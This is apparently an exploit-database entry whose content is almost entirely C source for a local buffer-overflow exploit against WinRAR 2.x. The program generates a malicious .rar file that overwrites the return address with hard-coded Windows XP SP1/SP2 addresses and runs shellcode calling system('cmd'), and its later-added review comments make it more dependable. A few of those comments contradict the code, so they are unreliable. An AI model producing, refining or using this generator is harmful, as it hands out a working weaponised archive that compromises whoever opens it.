WinRAR 1.0 Local Buffer Overflow Exploit

2008-07-16T00:00:00
ID SSV:9093
Type seebug
Reporter Root
Modified 2008-07-16T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /*
* WinRar local buffer overflow exploit V1.0
* Coded By ATmaCA
* Copyright (c) 2004 ProGroup Software, Inc.
* E-Mail:atmaca@prohack.net
* Web:www.prohack.net
* Usage: exploit <Target> <OutputPath>
* Targets:
* 1 - WinXP SP1 user32.dll [0x77D718FC]
* 2 - WinXP SP2 user32.dll [0x77D8AF0A]
* Example:exploit 1 myrar.rar
*/

/*
* All WinRar 2.x series are affected
* 3.x series not affected
* If you want to test and you do not have WinRar V2.x
* You can download it from http://atmaca.prorat.net/Src/winrar.zip
*/

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>

#ifdef __BORLANDC__
       #include <mem.h>
#endif

/* x86 single-byte NOP opcode, used as padding around the payload. */
#define NOP 0x90

/*crafted rar header*/
/* 41 bytes (sizeof - 1 drops the string terminator). The first seven
 * bytes are the RAR marker "Rar!\x1A\x07\x00"; main() writes the array
 * verbatim as the start of the output file. */
char winrar_header[] =
\"\\x52\\x61\\x72\\x21\\x1A\\x07\\x00\\xCF\\x90\\x73\\x00\\x00\\x0D\\x00\\x00\\x00\"
\"\\x00\\x00\\x00\\x00\\x4A\\x91\\x74\\x80\\x80\\x35\\x00\\x00\\x00\\x00\\x00\\x00\"
\"\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x12\";

/*launch a local cmd.exe*/
/* 15 bytes. Bytes 9..12 (the imm32 operand of the mov eax) are overwritten
 * at runtime by main() with sysadrr[targetnum]; the SP2 value embedded here
 * is only the default. NOTE(review): main() mutates this global in place. */
char shellcode[]=
\"\\x68\"                    // push
\"cmd \"                    // cmd
\"\\x8B\\xC4\"                // mov eax,esp
\"\\x50\"                    // push eax
\"\\xB8\\xc7\\x93\\xC2\\x77\"    // mov eax,77C293C7 (address of system() on WinXP SP2 - msvcrt.dll); patched per target by main()
\"\\xFF\\xD0\"                // call eax
;

/* Per-target saved-return-address overwrite, 4 bytes little-endian.
 * Indexed by argv[1] - 1 in main(); NOTE(review): that index is not
 * bounds-checked there, so any value other than 1 or 2 reads past the
 * table. Neither value contains a zero byte, which is what lets main()
 * emit it with fprintf("%s"). */
char *target[]=  //return addr
{
       \"\\xFC\\x18\\xD7\\x77\",   //User32 jmp esp addr  WinXp Sp1
       \"\\x0A\\xAF\\xD8\\x77\"    //User32 jmp esp addr  WinXp Sp2
};

/* Per-target msvcrt system() address, 4 bytes little-endian; copied into
 * shellcode[9..12] by main(). Same unchecked index as target[] above. */
char *sysadrr[]=
{
       \"\\x44\\x80\\xC2\\x77\",   //77C28044 XP Sp1  msvcrt.dll system()
       \"\\xC7\\x93\\xC2\\x77\"    //77C293C7 XP Sp2  msvcrt.dll system()
};

/* File-scope state used only by main(): output stream, 0-based target
 * index, and the shared loop counter. */
FILE   *di;
int    targetnum;
int    i;

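/* Element count of a true array (not of a pointer parameter). */
#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

/* Offset inside shellcode[] of the 4-byte system() address: it follows the
 * single 0xB8 "mov eax, imm32" opcode at index 8. */
#define SYSADDR_OFFSET 9
/* Every entry of target[] / sysadrr[] is a 4-byte little-endian address. */
#define ADDR_LEN 4

/* Padding counts of the generated file, unchanged from the original. */
#define PRE_NOPS  1051
#define POST_NOPS 50

/* Print the banner and usage text (to stdout, as the original did). */
static void usage(void)
{
        printf("\r\nWinRar local buffer overflow exploit V1.0\r\n");
        printf("Coded By ATmaCA\r\n");
        printf("Copyright ? 2004 ProGroup Software, Inc.\r\n");
        printf("E-Mail:atmaca@prohack.net\r\n");
        printf("Web:www.prohack.net\r\n\r\n");
        printf("Usage:\r\nexploit <Target> <OutputPath>\r\n\r\n");
        printf("Targets:\n");
        printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");
        printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");
        printf("Example:exploit 1 myrar.rar\n");
}

/* Write `count` NOP bytes to f. Returns 0 on success, -1 on write error. */
static int put_nops(FILE *f, size_t count)
{
        for (size_t k = 0; k < count; k++)
        {
                if (fputc(NOP, f) == EOF)
                {
                        return -1;
                }
        }
        return 0;
}

/* Write exactly `len` raw bytes to f. Returns 0 on success, -1 on a short
 * write. Used instead of fprintf("%s") so a zero byte cannot truncate the
 * output. */
static int put_bytes(FILE *f, const void *buf, size_t len)
{
        return fwrite(buf, 1, len, f) == len ? 0 : -1;
}

/*
 * Generate the crafted .rar file.
 *
 * argv[1] is the target number (1-based index into target[] / sysadrr[]),
 * argv[2] is the output path. The file written is, in order: the crafted
 * RAR header, PRE_NOPS NOPs, the target's 4-byte return address, POST_NOPS
 * NOPs, the shellcode with the target's system() address patched in at
 * SYSADDR_OFFSET, and POST_NOPS NOPs.
 *
 * Returns EXIT_SUCCESS, or EXIT_FAILURE on bad arguments, an unopenable
 * output path, or any write/close error (in which case the file is
 * incomplete). Differences from the original: int main, the target index
 * is validated before indexing the tables, the global shellcode[] is no
 * longer mutated, and every write and the final fclose() are checked.
 */
int main(int argc, char *argv[])
{
        if (argc < 3)
        {
                usage();
                return EXIT_FAILURE;
        }

        /* Parse and range-check the target number: the original used atoi()
         * unchecked, so "0", "3" or non-numeric input indexed out of bounds. */
        errno = 0;
        char *end = NULL;
        long sel = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE
            || sel < 1 || (unsigned long)sel > ARRAY_SIZE(target))
        {
                fprintf(stderr, "Invalid target '%s' (expected 1-%zu)\n",
                        argv[1], ARRAY_SIZE(target));
                return EXIT_FAILURE;
        }
        size_t targetnum = (size_t)sel - 1;

        /* Patch the system() address into a private copy of the shellcode
         * (sizeof - 1 drops the string terminator) instead of the global. */
        unsigned char sc[sizeof shellcode - 1];
        memcpy(sc, shellcode, sizeof sc);
        memcpy(sc + SYSADDR_OFFSET, sysadrr[targetnum], ADDR_LEN);

        FILE *di = fopen(argv[2], "wb");
        if (di == NULL)
        {
                fprintf(stderr, "Error opening file!\n");
                return EXIT_FAILURE;
        }

        int rc = EXIT_FAILURE;
        if (put_bytes(di, winrar_header, sizeof winrar_header - 1) != 0) goto out;
        if (put_nops(di, PRE_NOPS) != 0) goto out;
        /* Saved return address (EIP) is overwritten with the per-target
         * jmp esp address from target[]. */
        if (put_bytes(di, target[targetnum], ADDR_LEN) != 0) goto out;
        if (put_nops(di, POST_NOPS) != 0) goto out;
        if (put_bytes(di, sc, sizeof sc) != 0) goto out;
        if (put_nops(di, POST_NOPS) != 0) goto out;
        rc = EXIT_SUCCESS;

out:
        /* fclose() flushes buffered data; a failure here means the file on
         * disk is incomplete, so report it as an error. */
        if (fclose(di) != 0)
        {
                rc = EXIT_FAILURE;
        }
        if (rc == EXIT_SUCCESS)
        {
                printf("Exploit rar file %s has been generated!\n", argv[2]);
        }
        else
        {
                fprintf(stderr, "Error writing %s\n", argv[2]);
        }
        return rc;
}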